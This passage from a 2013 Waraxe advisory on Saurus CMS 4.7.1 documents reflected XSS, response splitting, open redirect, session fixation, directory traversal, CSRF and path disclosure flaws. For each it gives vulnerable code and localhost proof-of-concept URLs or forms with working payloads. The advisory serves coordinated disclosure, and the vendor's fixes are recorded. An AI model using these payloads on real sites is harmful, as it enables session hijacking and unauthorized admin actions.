echo '<input type=hidden id="selectform_'.$fdat_field.'"
name="'.$fdat_field.'" value="'.$fdat_value.'">';
}
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/user_management.php?foobar="><script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
31. Reflected XSS in "admin/permissions.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "selected_group", "user_id", "group_id" and "role_id"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/permissions.php" line 229:
------------------------[ source code start ]----------------------------------
<input type=hidden id="selectform_selected_group" name="selected_group"
value="<?=$site->fdat['selected_group']?>">
<input type=hidden id="selectform_user_id" name="user_id"
value="<?=$site->fdat['user_id']?>">
<input type=hidden id="selectform_group_id" name="group_id"
value="<?=$site->fdat['group_id']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/permissions.php?selected_group="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?user_id="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?group_id="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?role_id="><script>alert(123);</script>


Result:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
32. Reflected XSS in "admin/file_source.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied GET parameter "selected_group"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/file_source.php" line 47:
------------------------[ source code start ]----------------------------------
$callback = (string)$_GET['callback'];
...
<?=$callback;?>("<?=str_replace(array('"', "
", "
"),
array('"', '
', '
'), $fcontent);?>");
------------------------[ source code end ]------------------------------------

Test (parameter "file" must be valid):

http://localhost/saurus471/admin/file_source.php?file=public/test.php&callback=alert(123);//

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
33. Reflected XSS in "admin/change_config.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "flt_keel" and "group"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/change_config.php" line 1220:
------------------------[ source code start ]----------------------------------
<input type=hidden name=flt_keel value="<?=$site->fdat['flt_keel']?>">
...
<input type="hidden" name="group" value="<?=$site->fdat['group']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/change_config.php?group=1&flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/change_config.php?group="><script>alert(123);</script>

Result:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
34. Reflected XSS in "admin/forms.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "form_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/forms.php" line 222:
------------------------[ source code start ]----------------------------------
if($site->fdat['op'] == 'delete' && $site->fdat['form_id']) {
...
<input type=hidden name=form_id value="<?=$site->fdat['form_id']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/forms.php?op=delete&form_id="><script>alert(123);</script>


Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
35. Reflected XSS in "admin/lang_file.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "flt_keel" and "keel_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/lang_file.php" line 204:
------------------------[ source code start ]----------------------------------
$keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id];
...
<input type=hidden name=keel_id value="<?=$keel_id ?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/lang_file.php?op=import&flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/lang_file.php?op=import&keel_id="><script>alert(123);</script>


Result:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
36. Reflected XSS in "admin/select_group.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. all user-supplied parameters (excluding "selected_devices")
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/select_group.php" line 442:
------------------------[ source code start ]----------------------------------
foreach($site->fdat as $fdat_field=>$fdat_value) {
if($fdat_field != 'selected_devices'){
echo '<input type=hidden id="selectform_'.$fdat_field.'"
name="'.$fdat_field.'" value="'.$fdat_value.'">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/select_group.php?foobar="><script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
37. HTTP Response Splitting and insecure redirection in "redirect.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2


Php script "redirect.php" line 100:
------------------------[ source code start ]----------------------------------
if($_GET['url'])
{
$url = urldecode($_GET['url']);
//prevent Response Splitting attack
$url = preg_replace("!
|
.*!s", "", $url);

header('Location: '.$_GET['url']);
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/redirect.php?url=war%0d%0axe

Result (using php 5.3.24):

Warning: Header may not contain more than a single header, new line detected in
C:apache_wwwsaurus471
edirect.php on line 106

Test:

http://localhost/saurus471/redirect.php?url=http://php.net/

Result:

successful redirection


###############################################################################
38. HTTP Response Splitting and insecure redirection in "editor/redirect.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2


Php script "editor/redirect.php" line 100:
------------------------[ source code start ]----------------------------------
if($_GET['url'])
{
$url = urldecode($_GET['url']);
//prevent Response Splitting attack
$url = preg_replace("!
|
.*!s", "", $url);

header('Location: '.$_GET['url']);
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/editor/redirect.php?url=war%0d%0axe

Result (using php 5.3.24):

Warning: Header may not contain more than a single header, new line detected in
C:apache_wwwsaurus471editor
edirect.php on line 106

Test:

http://localhost/saurus471/editor/redirect.php?url=http://php.net/

Result:

successful redirection


###############################################################################
39. HTTP Response Splitting in "idcard/index.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET and POST parameters "targeturl"
Preconditions:
1. HTTPS connection needed ("SSLRequireSSL" directive in ".htaccess" file)
2. php version < 4.4.2 or < 5.1.2


Php script "idcard/index.php" line 9:
------------------------[ source code start ]----------------------------------
if($_GET['targeturl']) { $targeturl = '?target_url='.$_GET['targeturl']; }
elseif($_POST['targeturl']) { $targeturl = '?target_url='.$_POST['targeturl']; }


header('Location: ../idcard.php'.$targeturl);
------------------------[ source code end ]------------------------------------


###############################################################################
40. HTTP Response Splitting in "admin/lang_file.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "flt_keel" and "keel_id"
Preconditions:
1. php version < 4.4.2 or < 5.1.2
2. logged in as Saurus CMS admin


Php script "admin/lang_file.php" line 44:
------------------------[ source code start ]----------------------------------
$keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id];
...
if ($site->fdat['op'] == 'export' && $site->fdat['op2'] == 'salvesta'){

header("Content-Disposition: attachment; filename="language".$keel_id.".csv"");
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&flt_keel=%0d%0a
http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&keel_id=%0d%0a

Result (using php 5.3.24, from errorlog):

Header may not contain more than a single header, new line detected


###############################################################################
41. HTTP Response Splitting in "admin/publish.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2
2. logged in as Saurus CMS user with publish privileges


Php script "admin/publish.php" line 118:
------------------------[ source code start ]----------------------------------
header("Location: ".(empty($_SERVER['HTTPS']) ? 'http://' : 'https://').$site->CONF[hostname].$site->fdat[url]);
------------------------[ source code end ]------------------------------------


###############################################################################
42. HTTP Response Splitting in "add_comment.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "tpl", "c_tpl", "id", "redirect_url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2


Php script "add_comment.php" line 135:
------------------------[ source code start ]----------------------------------
header('Location: '.urldecode(preg_replace("!
|
.*!s", "", $_POST['redirect_url'])).'&lisa_alert=2');
...
header('Location: '.(empty($_SERVER['HTTPS']) ? 'http://':
'https://').$site->CONF['hostname'].$site->CONF['wwwroot'].
($site->in_editor?'/editor':'').'/?'.(($site->fdat['tpl'] ||
$site->fdat['c_tpl'])&&!$site->fdat['inserted_id']&&
!$site->fdat['jump_to_parent']?'tpl='.$site->fdat['tpl'].
'&c_tpl='.$site->fdat['c_tpl'].'&':'').'id='.$site->fdat['id'].'&lisa_alert=2');
...
if ($site->fdat['output_device'] == 'pda') {
if (strlen($site->fdat['text']) < 2 || strlen($site->fdat['nimi']) < 2) {
myRedirect($site->fdat['redirect_url']);
...
header("Location: ".urldecode($site->fdat['redirect_url']));
...
function myRedirect($url) {
...
header("Location: " . urldecode($url));
}
------------------------[ source code end ]------------------------------------


###############################################################################
43. Information leakage in "admin/check_requirements.php"
###############################################################################

Reason: insufficient access control

Test:

http://localhost/saurus471/admin/check_requirements.php

Result:

Simple GET request as shown above reveals some information about web server:
MySQL version, Webserver version, PHP version, multiple php setting values,
multiple directory permissions. Anyone can access this diagnostic script, no
access control exist.


###############################################################################
44. Session Fixation vulnerability in "admin/ajax_response.php"
###############################################################################

Attack vector:
1. user-supplied POST parameter "PHPSESSID"
Preconditions: none

Some years ago PHP session fixation attacks were easy to exploit: just add
PHPSESSID=112233445566 to URI and done. Modern PHP versions are more secure by
default: PHP setting "session.use_only_cookies" defaults to "1" since 5.3.0,
"session.use_trans_sid" defaults to "0". So even if PHP-based web application
does have session fixation vulnerability, many real world installations are hard
to exploit. Now let's look at Saurus CMS source code.

Php script "admin/ajax_response.php" line 27:
------------------------[ source code start ]----------------------------------
if(isset($_POST['PHPSESSID']))
{
session_id($_POST['PHPSESSID']);
session_start();
}
------------------------[ source code end ]------------------------------------

We can see, that user-submitted POST parameter PHPSESSID is used as argument for
PHP function "session_id()", which is followed by "session_start()". It means,
that even if "session.use_only_cookies=1" and "session.use_trans_sid=0", session
fixation attacks are possible.

Test:

<html><body><center>
<form action="http://localhost/saurus471/admin/ajax_response.php" method="post">
<input type="hidden" name="PHPSESSID" value="1122334455667788">
<input type="submit" value="Test">
</form>
</center></body></html>

Press "Test button" and then observe server response:

HTTP/1.1 200 OK
Date: Wed, 05 Jun 2013 10:26:19 GMT
Server: Apache/2.2.22 (Win32) DAV/2 mod_ssl/2.2.22 OpenSSL/0.9.8t
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1122334455667788; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript

Now log in as Saurus CMS admin and look for session cookies:

GET /saurus471/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: logged=1; PHPSESSID=1122334455667788
Connection: keep-alive

We can see, that after authentication session ID does not change, which indicates
Session Fixation vulnerability existence.

Solution: implement session ID renewal after successful user authentication.


###############################################################################
45. Directory Traversal vulnerability in "admin/ajax_response.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "name"
Preconditions:
1. logged in as valid Saurus CMS user
Result: logged in Saurus CMS user can test existence of arbitrary files on
remote server filesystem.


Php script "admin/ajax_response.php" line 52:
------------------------[ source code start ]----------------------------------
// check if a file exists
if($site->user->user_id && $_REQUEST['op'] == 'check_file' && $site->fdat['name'])
{
include_once($class_path.'adminpage.inc.php');

$pathinfo = str_replace(array('../', './', '..', '.'), '', $site->fdat['name']);
$pathinfo = explode('/', $pathinfo);
$filename = create_alias_from_string($pathinfo[count($pathinfo) - 1],true);
unset($pathinfo[count($pathinfo) - 1]);
$dirname = implode('/', $pathinfo);

if(file_exists($site->absolute_path.$dirname.'/'.$filename))
{
echo '{"file_exists": 1}';
}
else
{
echo '{"file_exists": 0}';
}
------------------------[ source code end ]------------------------------------

As seen above, php function "str_replace()" is used for filtering out possible
directory traversal substrings. Such filtering is not secure enough and can be
bypassed with specially crafted parameter "name".


Test 1:

http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt

Result: {"file_exists": 0}

Test 2:

http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/test.txt

Result: {"file_exists": 1}


###############################################################################
46. Cross-Site Request Forgery in "admin/trash.php"
###############################################################################

Reason:
1. missing CSRF token checks
Result:
1. Unauthorized deletion of objects from Recycle Bin


Php script "admin/trash.php" line 85:
------------------------[ source code start ]----------------------------------
if($site->fdat['delete_all'] && count($site->fdat['objects']))
{
//empty trash
for($i = count($site->fdat['objects']) - 1; $i >= 0; $i--)
{
foreach($site->fdat['objects'][$i] as $object_id => $values) if($object_id)
{
$delete_objs = new Alamlist(array(
'parent' => $object_id,
'klass' => $classes,
));

while($object = $delete_objs->next())
{
$object->del();
------------------------[ source code end ]------------------------------------

As seen above, there is no protection against CSRF.

Test:

http://localhost/saurus471/admin/trash.php?delete_all=1&objects[]=1

Result (from sitelog): "Recycle Bin emptied"

Solution: use "verify_form_token()" function in critical places


###############################################################################
47. Cross-Site Request Forgery in "admin/change_config.php"
###############################################################################

Reason:
1. missing CSRF token checks
Result:
1. Unauthorized modification of site configuration


Php script "admin/change_config.php" line 85:
------------------------[ source code start ]----------------------------------
if ($site->fdat[salvesta]==1) {
foreach ($site->fdat as $key=>$value) {

if ( substr ($key, 0, 4) == "cff_" ) {
$sql = $site->db->prepare("UPDATE config SET sisu=? WHERE nimi=?", $value, substr ($key, 4));
$sth = new SQL($sql);
------------------------[ source code end ]------------------------------------

We can see, that there is no protection against CSRF.

Tests:

http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=0
http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=1

Result:

Saurus CMS configuration setting "save_error_log" has been changed

Solution: use "verify_form_token()" function in critical places


###############################################################################
48. Cross-Site Request Forgery in "admin/forms.php"
###############################################################################

Reason:
1. missing CSRF token checks
Result:
1. Unauthorized deletion of forms


Php script "admin/forms.php" line 137:
------------------------[ source code start ]----------------------------------
if($site->fdat['op2'] == 'deleteconfirmed' && $site->fdat['form_id']) {

# delete form
$sql = $site->db->prepare("DELETE FROM forms WHERE form_id=?",$site->fdat['form_id']);
$sth = new SQL($sql);
------------------------[ source code end ]------------------------------------

We can see, that there is no protection against CSRF.

Test:

http://localhost/saurus471/admin/forms.php?op2=deleteconfirmed&form_id=5

Result (from sitelog): "Form 'testform' deleted"

Solution: use "verify_form_token()" function in critical places


###############################################################################
49. Full Path Disclosure in multiple scripts
###############################################################################

Preconditions:
1. PHP setting "display_errors = On"

Tests:

http://localhost/saurus471/admin/edit_object.php

Fatal error: Call to a member function msg() on a non-object in
C:apache_wwwsaurus471adminedit_object.php on line 1299

http://localhost/saurus471/admin/edit_pilt.php

Fatal error: Class 'Timer' not found in
C:apache_wwwsaurus471adminedit_pilt.php on line 21

http://localhost/saurus471/admin/templates.php

Fatal error: Call to a member function msg() on a non-object in
C:apache_wwwsaurus471admin emplates.php on line 57


Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

06.06.2013 -> First email to vendor
06.06.2013 -> First response email from vendor
06.06.2013 -> Sending detailed information to vendor
07.06.2013 -> Vendor started fixing found problems
21.06.2013 -> Found problems are fixed
14.07.2013 -> Current advisory released


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2013-07-14 (27242 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
Cybercrime news
Corrupted Microsoft Office Documents Used In Phishing Campaign
Russia Gives Life Sentence To Hydra Dark Web Kingpin After Seizing A Ton Of Drugs
Severity Of Risk Facing The UK Is Widely Underestimated
Hackers Stole $1.49 Billion In Cryptocurrency To Date In 2024
CyberVolk Analysis Explores Ransomware, Hacktivism Connections
Cyberattacks Cost British Businesses $55 Billion In Past 5 Years
Here's What Happens If You Don't Layer Network Security Or Remove Unused Web Shells
Russian Women Stepping Up For Cybercrime Outfits
Five Scattered Spider Suspects Indicted For Phishing And Heists
Crooks Snag $250k Wire Payment From AI Biz
Ransomware Attack On Oklahoma Medical Center Impacts 133,000
New GoIssue Tool Targets GitHub Devs And Corporate Supply Chains
Dark Web Crypto Laundering Kingpin Sentenced To 12.5 Years In Prison
FBI Warns US Organizations Of Fake Emergency Data Requests
Hackers Are Stealing Tickets From Ticketmaster Accounts
Scattered Spider, BlackCat Claw Their Way Back From The Undergound
Cybercrooks Are Targeting Bengal Cat Lovers In Australia
Operation Synergia II Sees Interpol Swoop On Global Cyber Crims
Rhysida Ransomware Attack On Columbus Claimed 500k Victims
Malware Operators Use Copyright Infringement To Lure In Businesses
North Korean Nation State Threat Actor Using Play Ransomware
Dutch Cops Pwn The Redline And Meta Infostealers, Leak VIP Aliases
Senator Accuses Sloppy Domain Registrars Of Aiding Russian Disinfo Campaigns
100 Million Impacted By Change Healthcare Attack
Detective Charged With Purchasing Stolen Credentials
Hacker news
Hackers Stole $1.49 Billion In Cryptocurrency To Date In 2024
Russian Hacker With $10 Million Bounty On His Head Reportedly Arrested
New York Fines GEICO And Travelers $11.3 Million In Data Breach Cases
Feds Seek To Grill Kansas City Man With Hacking Charges
ProjectSend Vulnerability Exploited In The Wild
CyberVolk Analysis Explores Ransomware, Hacktivism Connections
Russian Cyberspies Hacked Building Across Street From Target For W-Fi Attack
Five Scattered Spider Suspects Indicted For Phishing And Heists
North Korean Hackers Behind 2019 $42 Million Ethereum Heist
Equinox Notifies 21,000 Patients And Staff Of Data Theft
Palo Alto Sounds Alarm Over PAN-OS Zero Day Attacks
Thousands Of IoT Devices Turned Into Residential Proxies
Discontinued GeoVision Products Targeted In Botnet Attacks
Ransomware Attack On Oklahoma Medical Center Impacts 133,000
300 Drinking Systems In US Exposed To Disruptive, Damaging Hacker Attacks
Webscout Is Worth Checking Out
Palo Alto Networks Confirms New Firewall Zero-Day Exploitation
Known Brand, Gov Domains Hijacked Via Sitting Ducks Attacks
Man Gets 5 Years For Laundering Crypto From Bitfinex Hack
Two Men Charged For Hacking US Tax Preparation Firms
Iranian Threat Group Targets Aerospace Workers With Fake Job Lures
Citrix, Cisco, Fortinet Zero-Days Among 2023's Most Exploited Vulnerabilities
Ahold Delhaize Cybersecurity Incident Impacts Giant Food, Hannaford
Remcos RAT Now Exploiting Microsoft Excel Files
Amazon Confirms Employee Data Exposed In Leak Linked TO MOVEit Vulnerability
Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds